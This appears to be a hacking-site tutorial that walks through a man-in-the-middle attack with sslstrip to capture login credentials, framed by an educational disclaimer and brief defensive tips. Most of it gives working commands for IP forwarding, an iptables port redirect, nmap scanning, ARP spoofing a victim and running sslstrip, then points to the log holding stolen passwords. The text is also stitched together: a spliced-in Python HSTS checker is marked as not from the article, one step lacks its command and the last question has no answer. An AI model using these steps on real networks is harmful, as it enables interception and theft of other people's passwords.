Many of you are reading this article because you have heard that an SSL strip attack combined with a man in the middle attack can be used to hack popular websites like Facebook, Snapchat, Twitter, etc. The problem is that many people do not know what a man in the middle attack is or how it is carried out. In this tutorial, you will learn the basics of how a man in the middle attack with SSL strip works.
What is a man in the middle attack with an SSL strip?
This answer has two parts:
Man in the middle attack:
This is a network-based attack in which you become a proxy between the victim and the web page they are trying to visit. In that position, you can observe the target's activities and all of their network traffic.
SSL strip:
This is a more advanced manipulation of the protocol that strips the SSL (HTTPS) protection from the victim's connection to a website. In other words, it turns a secure https website into a vulnerable http one, so all the traffic and sensitive information being transferred is sent as plain text. Passwords can then be easily captured in plain text, along with other information such as credit card numbers.
Combining both MITM and SSL STRIP:
When you combine the two (an MITM attack with SSLStrip), you can convert HTTPS traffic to HTTP and intercept it by hijacking the victim's network path. The attack looks for HTTPS links and rewrites them to HTTP, making the connection vulnerable and insecure.
DISCLAIMER: This is an educational article meant to make readers aware of these hacks and how they work. Do not use this tool or technique on any website. Do not apply or execute any method or use any tool without the consent of the party concerned. The hackingworld.com team will not be in any way responsible for any illegal activities or usage of tools by you. We want to make readers aware of active threats and how they work. Use this article only for educational purposes.
So let’s start Stripping off SSL with MITM
So to use this network-based attack, you need to gather and set up the following things:
- The victim must be on the same network as you for this attack to work.
- The victim’s IP address
- The victim must be using Internet Explorer
- Your IP address
- Kali Linux installed and updated
I am assuming you have completed the setup above and gathered everything listed.
To find your own IP address on Kali Linux, just type “ifconfig”.
Step 1: Set up IP forwarding for the man in the middle attack
To put your machine in IP forwarding mode, so that it can relay the victim's traffic and act as the man in the middle, type the following command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Step 2: Set up iptables so sslstrip can downgrade HTTPS to HTTP
To redirect traffic arriving on port 80 to port 8080, where sslstrip will listen, so that the victim's outgoing connections pass through sslstrip and the attack can succeed, type the following command (note the double dashes):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Step 3: Find your network gateway
To find your Network Gateway type the following command in the Kali Linux terminal.
Step 4: Find the target's IP address
As mentioned before, we need the target machine's IP address for this attack to work. We will use nmap to scan the local subnet and find it:
nmap -sS -O 192.168.xx.xx/24
xx.xx = replace with the corresponding part of the gateway IP address, so the /24 covers your local subnet
Step 5: Arpspoof the target system
ARP spoofing is a network manipulation technique in which the attacker sends spoofed Address Resolution Protocol (ARP) messages onto the local area network (LAN), so that the victim sends its traffic to the attacker instead of the real gateway. To do this, type the following command.
arpspoof -i eth0 -t 192.168.yy.yy 192.168.xx.xx
192.168.yy.yy = IP address of the victim
192.168.xx.xx = IP address of the gateway router
Step 6: Start the SSLSTRIP attack on the target
Now sslstrip needs to listen on port 8080, where the iptables rule from Step 2 sends the traffic. To do this, open a new terminal and type the following command.
sslstrip -l 8080
Step 7: Waiting for the victim
For this tutorial, I will be both the victim and the attacker, using a Windows virtual machine as the victim. Once the victim machine is under attack, I type facebook.com in the Internet Explorer browser. Facebook, which should load over HTTPS, instead loads over HTTP.
In other words, whenever the victim opens their browser (Internet Explorer) and visits a website, their traffic is routed through our machine.
Step 8: Check the results
Now go to the home folder in Kali Linux and look for the sslstrip.log file. In it we can find the username and password the victim entered, captured by the man in the middle attack with SSL strip.
As you can imagine, this is a huge security risk. Simply put, it's a nightmare for regular people. And the worst part is that they do not even know that they have been hacked.
Why, you ask?
This is a huge security threat because as soon as the website is served as plain http, all your traffic becomes plain text. The encryption is gone; anyone can read your chats, and the data transferred from your machine is now accessible to everyone on the same network as you.
In the example above, the victim visits Facebook.com, but the page is delivered over http rather than HTTPS. As you can guess, SSL encryption is missing from the page, and all the traffic is easy to see and intercept.
This weakness can expose all of our passwords to attackers listening on the same network. The scary part of this whole process is that the target user will not even realize that the network is compromised and their traffic exposed.
How can I be secure from MITM and SSL strip attacks?
The first thing we need to address is the main weakness, which is Internet Explorer.
DO NOT USE INTERNET EXPLORER as your browser. Switch to Chrome or Mozilla Firefox as your main browser. They have built-in security features that check the traffic and warn about suspicious activity.
- Use security add-ons such as “HTTPS Everywhere” in Chrome and Firefox (available for both Mozilla Firefox and Google Chrome).
- Update your browser to the latest version
- Update your OS
- Use a good antivirus
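The browser-side protection the article alludes to is HTTP Strict Transport Security (HSTS): a site tells the browser to refuse plain HTTP for it, so the downgrade described above fails on later visits. As an added example (not from the article), the Python below parses constructed response headers and classifies how well each site resists the downgrade; the one-day "weak" threshold is this example's own heuristic.

```python
# Constructed response headers (not from the article) for three sites: a
# strong policy, a short-lived one, and none at all.
SAMPLE_HEADERS = {
    "bank.example": {"Strict-Transport-Security":
                     "max-age=31536000; includeSubDomains; preload"},
    "shop.example": {"Strict-Transport-Security": "max-age=300"},
    "blog.example": {"Content-Type": "text/html"},
}

ONE_DAY = 86400        # heuristic threshold chosen for this example
ONE_YEAR = 31536000    # minimum max-age the browser preload list requires

def parse_hsts(value):
    """Split a Strict-Transport-Security value into a {directive: value} dict."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if part:
            name, _, val = part.partition("=")
            directives[name.strip().lower()] = val.strip().strip('"')
    return directives

def strip_resistance(headers):
    """Classify how well a site's headers resist an HTTPS->HTTP downgrade.

    'none'      no HSTS: every visit can be stripped
    'weak'      HSTS with max-age under a day: the browser forgets the site quickly
    'returning' returning visitors refuse plain HTTP; only the very first visit is exposed
    'preload'   eligible for the built-in preload list, which also covers the first visit
    """
    lookup = {k.lower(): v for k, v in headers.items()}
    raw = lookup.get("strict-transport-security")
    if raw is None:
        return "none"
    d = parse_hsts(raw)
    try:
        max_age = int(d.get("max-age", "0"))
    except ValueError:
        max_age = 0
    if max_age < ONE_DAY:
        return "weak"
    if "preload" in d and "includesubdomains" in d and max_age >= ONE_YEAR:
        return "preload"
    return "returning"

if __name__ == "__main__":
    for site, hdrs in SAMPLE_HEADERS.items():
        print(f"{site}: {strip_resistance(hdrs)}")
```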
Commonly asked questions about man in the middle attacks and sslstrip
Q1. Is using this attack on public wifi legal?
No, it is not. It is only for testing purposes. This article is an educational article; please use it with the same intent.
Q2. Can I hack anyone over the internet?
No, this attack works only when both the attacker and the victim are on the same network.
Q3. Can I hack android devices with this attack?
Nope, not to my knowledge. Some very old browsers may be vulnerable, but nearly everyone uses Chrome or Firefox on Android, so you should be safe.
Q4. What is a gateway IP address?
It is the IP address of the router, which is the main gateway for the internet connection. Your TP-Link, D-Link, etc. routers are the usual examples.
Q5. Why does Microsoft not fix this issue?
I have no clue why Internet Explorer is still shipped with Windows. It is a disaster waiting to happen. Edge is comparatively safer. However, I prefer Chrome and Mozilla Firefox as the default choices.
Q6. Can I use this attack with an Android device?
I hope you liked the article; share and support the website. You can always donate to support us in writing new content.